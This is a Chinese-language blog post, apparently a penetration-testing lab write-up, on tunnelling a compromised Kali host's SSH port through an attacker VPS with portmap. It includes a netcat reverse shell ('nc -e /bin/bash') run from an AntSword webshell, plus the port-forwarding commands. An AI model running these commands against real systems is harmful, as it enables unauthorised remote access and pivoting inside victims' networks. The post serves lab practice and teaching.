跳到主要內容
Portmap 內網端口轉發紀錄
Portmap 內網端口轉發紀錄
作者 : Noth
前言 :
上一篇介紹了 Windows 下 Lcx 端口轉發,那 Linux 呢 ? 當然就是靠我們的 portmap 囉 ! xD 在實戰的過程,通常都是把 22 端口給轉發到外網去,在使用 SSH 去連接,接下來我們直接實戰一次就知道啦 !
內文 :
實作環境 :
攻擊者 : 192.168.111.130 (Windows 10,內網)
攻擊者 : 35.222.168.245 (VPS,Ubuntu,外網)
受害者 : 192.168.111.128 (Kali,內網)
實作流程:
VPS 執行 portmap,開始監聽 1055 端口,將流量導向 1060 端口
./portmap -m 2 -p1 1055 -h2 35.222.168.245 -p2 1060
kali 執行 portmap,將本地端的 22 port 轉發到公網 vps 1055 端口上
./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 35.222.168.245 -p2 1055
vps 成功監聽,之後將 1055 端口流量導向到 1060 端口
本地端 windows 進行 ssh 連線
ssh kali@35.222.168.245 -p 1060
成功連線
轉發成功 xD 但實戰當中不只有這種轉發方式,也會遇到一些 SSH 連線問題,例如 「ssh 登入錯誤 ECDSA host key for ip has changed 」 xD
相關的解決方式 : https://ithelp.ithome.com.tw/articles/10083004
只能說遇到問題就想辦法查資料解決 xD 累積解決問題的經驗 ! 那如果是在蟻劍的 Terminal 去執行呢 ? 需要透過反彈一個交互式的 Shell 去執行 Pormap ! 因為在蟻劍 Terminal 執行 portmap 時大概過了 30s 程式就會斷掉,筆者當時也是很一臉懵逼,後來想想應該是跟 Webserver 有很大的關係 ...
透過蟻劍上傳 portmap 上傳到 /var/tmp 目錄底下
蟻劍 Terminal 執行 nc 反彈 shell 到本機 windows :
nc -e /bin/bash 192.168.111.130 443
成功彈回一個交互式的 Shell :
VPS 執行 portmap 開始監聽 :
./portmap -m 2 -p1 1055 -h2 35.222.168.245 -p2 1060
本地端 windows 執行 portmap 將 22 port 轉發到 VPS 上 :
./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 35.222.168.245 -p2 1055
VPS 成功監聽 :
本地端 windows 進行 ssh 連線 :
ssh kali@35.222.168.245 -p 1060
成功連接 :
留言
張貼留言